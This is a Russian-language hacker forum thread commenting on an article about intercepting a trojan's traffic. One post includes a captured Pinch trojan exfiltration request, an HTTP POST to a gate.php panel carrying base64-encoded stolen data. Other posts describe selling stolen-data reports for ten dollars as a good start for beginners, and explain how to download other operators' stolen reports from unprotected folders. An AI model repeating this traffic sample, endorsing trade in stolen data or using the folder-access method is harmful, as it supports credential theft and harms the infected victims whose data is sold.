Авторские статьи Обратная сторона трояна

Discussion in 'Статьи' started by fucker"ok, 26 Jun 2007.

  1. es1k

    es1k New Member

    Joined:
    7 May 2007
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    мне статья понравилась , молодец, что не поленился , снял видео и расталковал всё.
     
  2. Tw!m4

    Tw!m4 Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    187
    Likes Received:
    19
    Reputations:
    0
    прет!
    а что если трой отсылает рапорты по www протоколу в base64, знаю....можно и расшифровать, но как то не получается, там по любому какието непонятные знаки стоят :(
    код таков:
    Code:
    POST /<directory>/gate.php HTTP/1.0
    Host: blah.blah.ru
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 2384
    
    a=<cool hatsker>@mail.ru&b=pinch3_report&d=report.bin&c=Qk02IK0PAABB....
    ну и так далее, че тут можна сделать?
     
  3. dscan

    dscan Elder - Старейшина

    Joined:
    23 Feb 2007
    Messages:
    265
    Likes Received:
    127
    Reputations:
    15
    ниче
     
  4. lab

    lab New Member

    Joined:
    30 Jun 2007
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    выгода- отчеты
     
  5. WAR!9G

    WAR!9G Elder - Старейшина

    Joined:
    24 Jun 2007
    Messages:
    112
    Likes Received:
    89
    Reputations:
    1
    Там и расшифровывать бэйс нечего - всё что ты получил бы при удачной расшифровке - данные о себе и своей машине...

    Знаешь, я пару лет тому назад, в течении дней двух-трёх, активно дизассемблил пинч, но таким редкостным гемороем не занимался, конечно изредка лениво просматривал отчёты на наличие того, чтобы меня могло нереально удивить, но в конце концов продавал отчёты в чистом виде. Для того кто уже чего то достиг и что то умеет 10 баксов - копейки, а для нормальных, начинающих пацанов то, что надо для старта! ;)
     
    4 people like this.
  6. Агафончег

    Агафончег New Member

    Joined:
    7 Oct 2007
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Доброго времени суток ;) Сделал вроде всё как написано, но не получается ничего выцепить из пакетов вот списочек пакетов, которые посылаются/принимаются после запуска трояна http://slil.ru/24991766 но ничего похожего на логин или пароль я не нашёл там...
     
  7. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,193
    Reputations:
    430
    А У тебя фамилия не Агафонов?
     
  8. k0lbasa

    k0lbasa Elder - Старейшина

    Joined:
    25 May 2008
    Messages:
    189
    Likes Received:
    131
    Reputations:
    -9
  9. DIMON4G

    DIMON4G Elder - Старейшина

    Joined:
    25 May 2008
    Messages:
    0
    Likes Received:
    108
    Reputations:
    -1
    а чё эт за ошибка в проге? :(

    [​IMG]
    разобрался :D , поставил се это http:///www.winpcap.org/
     
    #29 DIMON4G, 8 Dec 2008
    Last edited: 8 Dec 2008
  10. Pernat1y

    Pernat1y Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    479
    Likes Received:
    79
    Reputations:
    7
    ппц. написано-же было, что винПкап нужен =\
     
  11. Taktik

    Taktik Member

    Joined:
    27 Jun 2008
    Messages:
    27
    Likes Received:
    10
    Reputations:
    5
    Простите за некропостинг :)
    Даже если троян отправляет отчеты на гейт,а не на мыло, часто начинающие троянеры( :D ) забывают установить права на папку,где хранятся отчеты :) Тоесть там не надо логин/пассворд вводить,просто прямо в папку отчетов(reports обычно) заходим и скачиваем отчеты.
    Ну я себе 1 шоху так сделал :D
     
    #31 Taktik, 12 Apr 2009
    Last edited: 13 Apr 2009
    1 person likes this.